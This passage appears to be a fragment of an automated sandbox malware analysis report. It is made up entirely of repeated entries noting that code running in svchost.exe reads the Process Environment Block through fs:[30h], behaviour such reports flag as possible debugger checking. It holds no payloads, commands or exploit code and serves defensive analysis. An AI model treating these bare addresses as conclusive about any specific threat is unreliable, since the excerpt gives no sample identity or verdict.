          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B402E1 mov eax, dword ptr fs:[00000030h]4_2_03B402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B402E1 mov eax, dword ptr fs:[00000030h]4_2_03B402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B402E1 mov eax, dword ptr fs:[00000030h]4_2_03B402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]4_2_03B3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]4_2_03B3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]4_2_03B3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]4_2_03B3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]4_2_03B3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2823B mov eax, dword ptr fs:[00000030h]4_2_03B2823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C0625D mov eax, dword ptr fs:[00000030h]4_2_03C0625D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE0274 mov eax, dword ptr fs:[00000030h]4_2_03BE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE0274 mov eax, dword ptr fs:[00000030h]4_2_03BE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE0274 mov eax, dword ptr fs:[00000030h]4_2_03BE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE0274 mov eax, dword ptr fs:[00000030h]4_2_03BE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE0274 mov eax, dword ptr fs:[00000030h]4_2_03BE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE0274 mov eax, dword ptr fs:[00000030h]4_2_03BE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE0274 mov eax, dword ptr fs:[00000030h]4_2_03BE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE0274 mov eax, dword ptr fs:[00000030h]4_2_03BE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE0274 mov eax, dword ptr fs:[00000030h]4_2_03BE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE0274 mov eax, dword ptr fs:[00000030h]4_2_03BE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE0274 mov eax, dword ptr fs:[00000030h]4_2_03BE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE0274 mov eax, dword ptr fs:[00000030h]4_2_03BE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B34260 mov eax, dword ptr fs:[00000030h]4_2_03B34260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B34260 mov eax, dword ptr fs:[00000030h]4_2_03B34260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B34260 mov eax, dword ptr fs:[00000030h]4_2_03B34260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2826B mov eax, dword ptr fs:[00000030h]4_2_03B2826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2A250 mov eax, dword ptr fs:[00000030h]4_2_03B2A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B36259 mov eax, dword ptr fs:[00000030h]4_2_03B36259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BEA250 mov eax, dword ptr fs:[00000030h]4_2_03BEA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BEA250 mov eax, dword ptr fs:[00000030h]4_2_03BEA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB8243 mov eax, dword ptr fs:[00000030h]4_2_03BB8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB8243 mov ecx, dword ptr fs:[00000030h]4_2_03BB8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB019F mov eax, dword ptr fs:[00000030h]4_2_03BB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB019F mov eax, dword ptr fs:[00000030h]4_2_03BB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB019F mov eax, dword ptr fs:[00000030h]4_2_03BB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB019F mov eax, dword ptr fs:[00000030h]4_2_03BB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2A197 mov eax, dword ptr fs:[00000030h]4_2_03B2A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2A197 mov eax, dword ptr fs:[00000030h]4_2_03B2A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2A197 mov eax, dword ptr fs:[00000030h]4_2_03B2A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C061E5 mov eax, dword ptr fs:[00000030h]4_2_03C061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B70185 mov eax, dword ptr fs:[00000030h]4_2_03B70185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BEC188 mov eax, dword ptr fs:[00000030h]4_2_03BEC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BEC188 mov eax, dword ptr fs:[00000030h]4_2_03BEC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BD4180 mov eax, dword ptr fs:[00000030h]4_2_03BD4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BD4180 mov eax, dword ptr fs:[00000030h]4_2_03BD4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B601F8 mov eax, dword ptr fs:[00000030h]4_2_03B601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]4_2_03BAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]4_2_03BAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]4_2_03BAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]4_2_03BAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]4_2_03BAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF61C3 mov eax, dword ptr fs:[00000030h]4_2_03BF61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF61C3 mov eax, dword ptr fs:[00000030h]4_2_03BF61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B60124 mov eax, dword ptr fs:[00000030h]4_2_03B60124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C04164 mov eax, dword ptr fs:[00000030h]4_2_03C04164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03C04164 mov eax, dword ptr fs:[00000030h]4_2_03C04164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDA118 mov ecx, dword ptr fs:[00000030h]4_2_03BDA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDA118 mov eax, dword ptr fs:[00000030h]4_2_03BDA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDA118 mov eax, dword ptr fs:[00000030h]4_2_03BDA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDA118 mov eax, dword ptr fs:[00000030h]4_2_03BDA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF0115 mov eax, dword ptr fs:[00000030h]4_2_03BF0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDE10E mov eax, dword ptr fs:[00000030h]4_2_03BDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDE10E mov ecx, dword ptr fs:[00000030h]4_2_03BDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDE10E mov eax, dword ptr fs:[00000030h]4_2_03BDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDE10E mov eax, dword ptr fs:[00000030h]4_2_03BDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDE10E mov ecx, dword ptr fs:[00000030h]4_2_03BDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDE10E mov eax, dword ptr fs:[00000030h]4_2_03BDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDE10E mov eax, dword ptr fs:[00000030h]4_2_03BDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDE10E mov ecx, dword ptr fs:[00000030h]4_2_03BDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDE10E mov eax, dword ptr fs:[00000030h]4_2_03BDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BDE10E mov ecx, dword ptr fs:[00000030h]4_2_03BDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2C156 mov eax, dword ptr fs:[00000030h]4_2_03B2C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BC8158 mov eax, dword ptr fs:[00000030h]4_2_03BC8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B36154 mov eax, dword ptr fs:[00000030h]4_2_03B36154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B36154 mov eax, dword ptr fs:[00000030h]4_2_03B36154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BC4144 mov eax, dword ptr fs:[00000030h]4_2_03BC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BC4144 mov eax, dword ptr fs:[00000030h]4_2_03BC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BC4144 mov ecx, dword ptr fs:[00000030h]4_2_03BC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BC4144 mov eax, dword ptr fs:[00000030h]4_2_03BC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BC4144 mov eax, dword ptr fs:[00000030h]4_2_03BC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF60B8 mov eax, dword ptr fs:[00000030h]4_2_03BF60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]4_2_03BF60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B280A0 mov eax, dword ptr fs:[00000030h]4_2_03B280A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BC80A8 mov eax, dword ptr fs:[00000030h]4_2_03BC80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3208A mov eax, dword ptr fs:[00000030h]4_2_03B3208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]4_2_03B2C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B720F0 mov ecx, dword ptr fs:[00000030h]4_2_03B720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]4_2_03B2A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B380E9 mov eax, dword ptr fs:[00000030h]4_2_03B380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB60E0 mov eax, dword ptr fs:[00000030h]4_2_03BB60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB20DE mov eax, dword ptr fs:[00000030h]4_2_03BB20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BC6030 mov eax, dword ptr fs:[00000030h]4_2_03BC6030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2A020 mov eax, dword ptr fs:[00000030h]4_2_03B2A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B2C020 mov eax, dword ptr fs:[00000030h]4_2_03B2C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4E016 mov eax, dword ptr fs:[00000030h]4_2_03B4E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4E016 mov eax, dword ptr fs:[00000030h]4_2_03B4E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4E016 mov eax, dword ptr fs:[00000030h]4_2_03B4E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4E016 mov eax, dword ptr fs:[00000030h]4_2_03B4E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB4000 mov ecx, dword ptr fs:[00000030h]4_2_03BB4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BD2000 mov eax, dword ptr fs:[00000030h]4_2_03BD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BD2000 mov eax, dword ptr fs:[00000030h]4_2_03BD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BD2000 mov eax, dword ptr fs:[00000030h]4_2_03BD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BD2000 mov eax, dword ptr fs:[00000030h]4_2_03BD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BD2000 mov eax, dword ptr fs:[00000030h]4_2_03BD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BD2000 mov eax, dword ptr fs:[00000030h]4_2_03BD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BD2000 mov eax, dword ptr fs:[00000030h]4_2_03BD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BD2000 mov eax, dword ptr fs:[00000030h]4_2_03BD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5C073 mov eax, dword ptr fs:[00000030h]4_2_03B5C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B32050 mov eax, dword ptr fs:[00000030h]4_2_03B32050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB6050 mov eax, dword ptr fs:[00000030h]4_2_03BB6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B307AF mov eax, dword ptr fs:[00000030h]4_2_03B307AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BE47A0 mov eax, dword ptr fs:[00000030h]4_2_03BE47A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BD678E mov eax, dword ptr fs:[00000030h]4_2_03BD678E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B347FB mov eax, dword ptr fs:[00000030h]4_2_03B347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B347FB mov eax, dword ptr fs:[00000030h]4_2_03B347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B527ED mov eax, dword ptr fs:[00000030h]4_2_03B527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B527ED mov eax, dword ptr fs:[00000030h]4_2_03B527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B527ED mov eax, dword ptr fs:[00000030h]4_2_03B527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BBE7E1 mov eax, dword ptr fs:[00000030h]4_2_03BBE7E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]4_2_03B3C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB07C3 mov eax, dword ptr fs:[00000030h]4_2_03BB07C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6273C mov eax, dword ptr fs:[00000030h]4_2_03B6273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6273C mov ecx, dword ptr fs:[00000030h]4_2_03B6273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6273C mov eax, dword ptr fs:[00000030h]4_2_03B6273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAC730 mov eax, dword ptr fs:[00000030h]4_2_03BAC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6C720 mov eax, dword ptr fs:[00000030h]4_2_03B6C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6C720 mov eax, dword ptr fs:[00000030h]4_2_03B6C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B30710 mov eax, dword ptr fs:[00000030h]4_2_03B30710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B60710 mov eax, dword ptr fs:[00000030h]4_2_03B60710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6C700 mov eax, dword ptr fs:[00000030h]4_2_03B6C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B38770 mov eax, dword ptr fs:[00000030h]4_2_03B38770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40770 mov eax, dword ptr fs:[00000030h]4_2_03B40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40770 mov eax, dword ptr fs:[00000030h]4_2_03B40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40770 mov eax, dword ptr fs:[00000030h]4_2_03B40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40770 mov eax, dword ptr fs:[00000030h]4_2_03B40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40770 mov eax, dword ptr fs:[00000030h]4_2_03B40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40770 mov eax, dword ptr fs:[00000030h]4_2_03B40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40770 mov eax, dword ptr fs:[00000030h]4_2_03B40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40770 mov eax, dword ptr fs:[00000030h]4_2_03B40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40770 mov eax, dword ptr fs:[00000030h]4_2_03B40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40770 mov eax, dword ptr fs:[00000030h]4_2_03B40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40770 mov eax, dword ptr fs:[00000030h]4_2_03B40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40770 mov eax, dword ptr fs:[00000030h]4_2_03B40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B30750 mov eax, dword ptr fs:[00000030h]4_2_03B30750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BBE75D mov eax, dword ptr fs:[00000030h]4_2_03BBE75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72750 mov eax, dword ptr fs:[00000030h]4_2_03B72750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72750 mov eax, dword ptr fs:[00000030h]4_2_03B72750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB4755 mov eax, dword ptr fs:[00000030h]4_2_03BB4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6674D mov esi, dword ptr fs:[00000030h]4_2_03B6674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6674D mov eax, dword ptr fs:[00000030h]4_2_03B6674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6674D mov eax, dword ptr fs:[00000030h]4_2_03B6674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B666B0 mov eax, dword ptr fs:[00000030h]4_2_03B666B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]4_2_03B6C6A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B34690 mov eax, dword ptr fs:[00000030h]4_2_03B34690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B34690 mov eax, dword ptr fs:[00000030h]4_2_03B34690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]4_2_03BAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]4_2_03BAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]4_2_03BAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]4_2_03BAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB06F1 mov eax, dword ptr fs:[00000030h]4_2_03BB06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB06F1 mov eax, dword ptr fs:[00000030h]4_2_03BB06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]4_2_03B6A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]4_2_03B6A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4E627 mov eax, dword ptr fs:[00000030h]4_2_03B4E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B66620 mov eax, dword ptr fs:[00000030h]4_2_03B66620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B68620 mov eax, dword ptr fs:[00000030h]4_2_03B68620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B3262C mov eax, dword ptr fs:[00000030h]4_2_03B3262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72619 mov eax, dword ptr fs:[00000030h]4_2_03B72619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAE609 mov eax, dword ptr fs:[00000030h]4_2_03BAE609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4260B mov eax, dword ptr fs:[00000030h]4_2_03B4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4260B mov eax, dword ptr fs:[00000030h]4_2_03B4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4260B mov eax, dword ptr fs:[00000030h]4_2_03B4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4260B mov eax, dword ptr fs:[00000030h]4_2_03B4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4260B mov eax, dword ptr fs:[00000030h]4_2_03B4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4260B mov eax, dword ptr fs:[00000030h]4_2_03B4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4260B mov eax, dword ptr fs:[00000030h]4_2_03B4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B62674 mov eax, dword ptr fs:[00000030h]4_2_03B62674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF866E mov eax, dword ptr fs:[00000030h]4_2_03BF866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BF866E mov eax, dword ptr fs:[00000030h]4_2_03BF866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6A660 mov eax, dword ptr fs:[00000030h]4_2_03B6A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6A660 mov eax, dword ptr fs:[00000030h]4_2_03B6A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B4C640 mov eax, dword ptr fs:[00000030h]4_2_03B4C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B545B1 mov eax, dword ptr fs:[00000030h]4_2_03B545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B545B1 mov eax, dword ptr fs:[00000030h]4_2_03B545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB05A7 mov eax, dword ptr fs:[00000030h]4_2_03BB05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB05A7 mov eax, dword ptr fs:[00000030h]4_2_03BB05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB05A7 mov eax, dword ptr fs:[00000030h]4_2_03BB05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6E59C mov eax, dword ptr fs:[00000030h]4_2_03B6E59C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B32582 mov eax, dword ptr fs:[00000030h]4_2_03B32582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B32582 mov ecx, dword ptr fs:[00000030h]4_2_03B32582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B64588 mov eax, dword ptr fs:[00000030h]4_2_03B64588
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03B5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03B5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03B5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03B5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03B5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03B5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03B5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03B5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B325E0 mov eax, dword ptr fs:[00000030h]4_2_03B325E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6C5ED mov eax, dword ptr fs:[00000030h]4_2_03B6C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6C5ED mov eax, dword ptr fs:[00000030h]4_2_03B6C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B365D0 mov eax, dword ptr fs:[00000030h]4_2_03B365D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]4_2_03B6A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]4_2_03B6A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6E5CF mov eax, dword ptr fs:[00000030h]4_2_03B6E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6E5CF mov eax, dword ptr fs:[00000030h]4_2_03B6E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40535 mov eax, dword ptr fs:[00000030h]4_2_03B40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40535 mov eax, dword ptr fs:[00000030h]4_2_03B40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40535 mov eax, dword ptr fs:[00000030h]4_2_03B40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40535 mov eax, dword ptr fs:[00000030h]4_2_03B40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40535 mov eax, dword ptr fs:[00000030h]4_2_03B40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40535 mov eax, dword ptr fs:[00000030h]4_2_03B40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E53E mov eax, dword ptr fs:[00000030h]4_2_03B5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E53E mov eax, dword ptr fs:[00000030h]4_2_03B5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E53E mov eax, dword ptr fs:[00000030h]4_2_03B5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E53E mov eax, dword ptr fs:[00000030h]4_2_03B5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B5E53E mov eax, dword ptr fs:[00000030h]4_2_03B5E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BC6500 mov eax, dword ptr fs:[00000030h]4_2_03BC6500
